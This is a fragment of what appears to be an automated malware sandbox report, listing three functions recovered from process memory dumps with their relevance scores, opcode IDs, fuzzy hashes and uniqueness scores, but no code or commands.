                                                  • Instruction Fuzzy Hash: 2B91CF30B006049FDB54AB78D8567AE76EAEF84754F218538F906EB784DF30ED058B94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00863A50, Relevance: 3.0, Strings: 1, Instructions: 1787COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351416134.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 5
                                                  • API String ID: 0-2226203566
                                                  • Opcode ID: e072f140c329c34d901d4667241dc44a44e73a23c827a0c39ff4f42ff6c66b89
                                                  • Instruction ID: 89fe6cf14b8aa3a2a021eb994b3a04ff007205d938cff02da8c7174a8fdcc32f
                                                  • Opcode Fuzzy Hash: e072f140c329c34d901d4667241dc44a44e73a23c827a0c39ff4f42ff6c66b89
                                                  • Instruction Fuzzy Hash: AE030770D10B598ACB50EF68C89469DF7B1FF99300F15C69AE548BB261EB30AAC4CF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 007D0048, Relevance: 1.7, Strings: 1, Instructions: 433COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2351383479.00000000007D0000.00000040.00000001.sdmp, Offset: 007D0000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fCyl
                                                  • API String ID: 0-4146899862
                                                  • Opcode ID: bdc2a7b2113c325b433f77f4b4ef35314e33ca5a35499164f1798503fb2961de
                                                  • Instruction ID: bff6169612394471d5af38cc6810d08f8ef05ffab736bf864b2449990db8de6b
                                                  • Opcode Fuzzy Hash: bdc2a7b2113c325b433f77f4b4ef35314e33ca5a35499164f1798503fb2961de
                                                  • Instruction Fuzzy Hash: CC027C30A002148FCB54EFB4D854B9EB7B6BF88304F258569E50AEB795DF349C85CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 003621CF, Relevance: .2, Instructions: 177COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2350920447.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e4a1de5647d53d1f5536ac6a96b410725c92173e19ea7e56fbc019e66a25d58
                                                  • Instruction ID: 5c20d5eb7e1dd076c368dbd6056ca5bb153c5170c33de2b15243cfa2ecf63eaf
                                                  • Opcode Fuzzy Hash: 2e4a1de5647d53d1f5536ac6a96b410725c92173e19ea7e56fbc019e66a25d58
                                                  • Instruction Fuzzy Hash: 5651D13870A7804FD342D7399860B563BA19F96348F5BC8BAD448CF297EA65DC0ACB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%